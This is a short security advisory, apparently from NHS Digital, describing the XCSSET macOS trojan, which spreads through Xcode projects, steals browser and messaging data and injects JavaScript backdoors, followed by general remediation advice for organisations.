XCSSET Trojan
First observed in early August 2020, XCSSET is an information stealing trojan that uses an unusual infection method to apparently target Xcode developers.
Summary
First observed in early August 2020, XCSSET is an information stealing trojan that uses an unusual infection method to apparently target Xcode developers.
Threat details
Introduction
XCSSET is a newly observed trojan seemingly targeting Mac users and Xcode developers.
Delivery
At the time of publication, it is unclear how XCSSET initially gains access to target systems. However, it is now that once it gains access, XCSSET will alter any reachable Xcode development projects such that a new copy of it is executed whenever an affected project is built. This capability appears to extend to projects stored in online repositories such as GitHub.
Activities
Once installed on a system, XCSSET will attempt to extract user information from web browsers, messaging platforms, and note-taking applications. It will also use universal cross-site-scripting (UXSS) attacks to inject Javascript backdoors into websites the user visits in order to collect financial information and credentials. This information is then sent to a command and control server.
Additionally, XCSSET is able to create and encrypt files, suggesting it can also be used as a ransomware tool. This capability is likely to be used as a diversionary tactic once XCSSET's operators have determined it has gathered sufficient information.
Remediation advice
Additionally, to prevent and detect an infection, NHS Digital advises that:
- Secure configurations are applied to all devices.
- Security updates are applied at the earliest opportunity.
- Tamper protection settings in security products are enabled where available.
- Obsolete platforms are segregated from the rest of the network.
- IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
- Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
- Administrative accounts are only used for necessary purposes.
- Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
- Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.
Please note that the NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.
Indicators of compromise
Definitive source of threat updates
Last edited: 19 August 2020 2:45 pm